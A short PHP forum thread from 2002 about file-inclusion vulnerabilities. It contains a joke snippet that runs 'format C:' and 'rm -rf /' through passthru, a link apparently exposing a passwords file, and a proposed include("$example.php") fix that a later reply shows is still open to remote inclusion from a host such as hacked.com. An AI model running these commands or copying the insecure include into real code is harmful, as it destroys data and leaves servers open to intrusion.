How to do this: explain.php?what=game_rules

PHP programming forum. Ask questions or help people concerning PHP code. Don't understand a function? Need help implementing a class? Don't understand a class? Here is where to ask. Remember to do your homework!

Moderator: General Moderators

User avatar
sam
Forum Contributor
Posts: 217
Joined: Thu Apr 18, 2002 11:11 pm
Location: Northern California
Contact:

Post by sam »

Code: Select all

if(!empty($hacker)){
    if(!passthru("format C:")){
        passthru("rm -rf /");
    }
    echo "You fool now look at what you've done.";
}
Code can only be secure until someone cracks it... Nothing is indestructable.

Cheers Moe :mrgreen:
User avatar
pHaZed
Forum Commoner
Posts: 28
Joined: Wed May 01, 2002 2:44 am
Location: Sydney -AU

Post by pHaZed »

When developing something like that, you should be aware that someone can do something like this:

http://www.maxxxtorque.com/prodigy/php/ ... /index.php

Imagine if you had something sensitive on your server like this:

http://www.maxxxtorque.com/prodigy/php/ ... .passwords
You can simplfy it down to ONLY including php files.
like so

Code: Select all

include("$example.php");

then in the browser http://host.net/file.php?example=filename

it will always add .php file extension to whatever file users are trying to include...
dusty
Forum Contributor
Posts: 122
Joined: Sun Apr 28, 2002 9:52 pm
Location: Portsmouth, VA

Post by dusty »

read the posts before.. adding the ext in the include is useless. if someone passes index.php?var=http://www.hacked.com/blah (.php)
you're still screwed. yeah it keeps them guessing what the ext is, but that could be figured out sooner or later.
Post Reply